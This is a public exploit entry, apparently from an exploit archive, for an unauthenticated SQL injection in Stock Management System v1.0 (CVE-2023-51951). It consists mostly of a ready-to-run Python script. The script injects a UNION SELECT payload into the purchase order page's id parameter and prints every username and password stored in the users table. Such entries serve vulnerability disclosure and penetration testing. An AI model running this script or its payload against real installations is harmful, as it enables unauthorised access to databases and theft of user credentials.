Stock Management System v1.0 - Unauthenticated SQL Injection - CVE-2023-51951

1. # Exploit Title: Stock Management System v1.0 - Unauthenticated SQL Injection
2. # Date: February 6, 2024
3. # Exploit Author: Josué Mier (aka blu3ming) Security Researcher & Penetration Tester @wizlynx group
4. # Vendor Homepage: https://www.sourcecodester.com/php/15023/stock-management-system-phpoop-source-code.html
5. # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/sms.zip
6. # Tested on: Linux and Windows, XAMPP
7. # CVE-2023-51951
8. # Vendor: oretnom23
9. # Version: v1.0
10. # Exploit Description:
11. #   The web application Stock Management System is affected by an unauthenticated SQL Injection affecting Version 1.0, allowing remote attackers to dump the SQL database using an Error-Based Injection attack.
12.  
13. import requests
14. from bs4 import BeautifulSoup
15. import argparse
16.  
17. def print_header():
18.     print("\033[1m\nStock Management System v1.0\033[0m")
19.     print("\033[1mSQL Injection Exploit\033[0m")
20.     print("\033[96mby blu3ming\n\033[0m")
21.  
22. def parse_response(target_url):
23.     try:
24.         target_response = requests.get(target_url)
25.         soup = BeautifulSoup(target_response.text, 'html.parser')
26.         textarea_text = soup.find('textarea', {'name': 'remarks', 'id': 'remarks'}).text
27.  
28.         # Split the text using ',' as a delimiter
29.         users = textarea_text.split(',')
30.         for user in users:
31.             # Split username and password using ':' as a delimiter
32.             username, password = user.split(':')
33.             print("| {:<20} | {:<40} |".format(username, password))
34.     except:
35.         print("No data could be retrieved. Try again.")
36.  
37. def retrieve_data(base_url):
38.     target_path = '/sms/admin/?page=purchase_order/manage_po&id='
39.     payload = "'+union+select+1,2,3,4,5,6,7,8,group_concat(username,0x3a,password),10,11,12,13+from+users--+-"
40.  
41.     #Dump users table
42.     target_url = base_url + target_path + payload
43.     print("+----------------------+------------------------------------------+")
44.     print("| {:<20} | {:<40} |".format("username", "password"))
45.     print("+----------------------+------------------------------------------+")
46.     parse_response(target_url)
47.     print("+----------------------+------------------------------------------+\n")
48.  
49. if __name__ == "__main__":
50.     about  = 'Unauthenticated SQL Injection Exploit - Stock Management System'
51.     parser = argparse.ArgumentParser(description=about)
52.     parser.add_argument('--url', dest='base_url', required=True, help='Stock Management System URL')
53.     args = parser.parse_args()
54.     print_header()
55.     retrieve_data(args.base_url)
56.